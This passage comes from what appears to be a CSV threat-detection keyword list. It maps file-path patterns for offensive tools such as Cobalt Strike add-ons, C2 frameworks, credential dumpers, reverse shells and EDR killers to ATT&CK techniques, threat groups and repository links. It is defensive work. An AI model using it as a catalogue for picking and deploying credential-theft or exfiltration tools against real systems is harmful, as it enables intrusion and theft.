- T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*/Sharefinder.ps1","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*/shares-with-SCF.txt*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*/SharpAzbelt.git*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","1","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" +"*/SharpBlackout.git*","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","10","1","68","16","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" +"*/SharpC2*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*/SharpCalendar/*.*","offensive_tool_keyword","cobaltstrike",".NET Assembly to Retrieve Outlook Calendar Details","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpCalendar","1","1","N/A","10","10","13","1","2021-10-07T19:42:20Z","2021-10-07T17:11:46Z" +"*/SharpCat/*","offensive_tool_keyword","cobaltstrike","C# alternative to the linux cat command... Prints file contents to console. For use with Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpCat","1","1","N/A","10","10","16","5","2021-07-15T15:01:02Z","2021-07-15T14:57:53Z" +"*/SharpChromium.git*","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","608","98","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" +"*/SharpCloud.git*","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","154","27","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" +"*/SharpCollection/*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*/SharpCompile/*","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" +"*/sharpcompile_*.*","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" +"*/SharpCradle/*","offensive_tool_keyword","cobaltstrike","SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/SharpCradle","1","1","N/A","10","10","275","59","2020-12-30T17:15:51Z","2018-10-23T06:21:53Z" +"*/SharpDomainSpray.git*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" +"*/SharpDoor.cs*","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1076 - T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","7","3","298","64","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" +"*/SharpDoor.git*","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1076 - T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","7","3","298","64","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" +"*/SharpDPAPI.git*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*/SharpDump*","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/SharpEfsPotato*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" +"*/SharpExfiltrate.git*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" +"*/SharpExfiltrate/*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" +"*/SharpGmailC2.git*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" +"*/SharpHandler.py*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/SharpHide.git*","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","445","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" +"*/SharpLDAP.git*","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","1","50","7","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z" +"*/SharpNoPSExec*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" +"*/SharpRDP.git*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*/SharpRDPHijack*","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","1","N/A","10","4","382","84","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z" +"*/SharpShares/Enums*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"*/SharpShellPipe.git*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" +"*/SharpSocks*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" +"*/SharpSploit*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/SharpSploit/*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","1","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" +"*/SharpSpoolTrigger*","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","4","366","43","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" +"*/SharpSpray.exe*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" +"*/SharpStay.git*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","1","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"*/SharpStay/*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","1","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"*/SharpSword.git*","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","8","10","110","13","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" +"*/SharpSword/SharpSword*","offensive_tool_keyword","cobaltstrike","Read the contents of DOCX files using Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","10","10","110","13","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" +"*/SharpSystemTriggers*","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","4","366","43","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" +"*/SharpTerminator/*","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" +"*/SharpUnhooker.git*","offensive_tool_keyword","SharpUnhooker","C# Based Universal API Unhooker","T1055.012 - T1070.004 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GetRektBoy724/SharpUnhooker","1","1","N/A","9","4","365","103","2022-02-18T13:11:11Z","2021-05-17T01:33:38Z" +"*/SharpView.git*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" +"*/SharpWSUS*","offensive_tool_keyword","SharpWSUS","SharpWSUS is a CSharp tool for lateral movement through WSUS","T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nettitude/SharpWSUS","1","1","N/A","N/A","5","408","63","2022-11-20T23:41:40Z","2022-05-04T08:27:57Z" +"*/SharPyShell*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" +"*/shell/password.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*/shell/shell_port.*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" +"*/shell_exec.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/Shell3er/*","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059.001 - T1021.004 - T1090.002","TA0002 - TA0011","N/A","N/A","shell spawning","https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1","1","1","N/A","N/A","1","56","11","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" +"*/shellcode*loader.bin*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/shellcode.bin*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*/shellcode.bin.*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*/shellcode.hex*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility 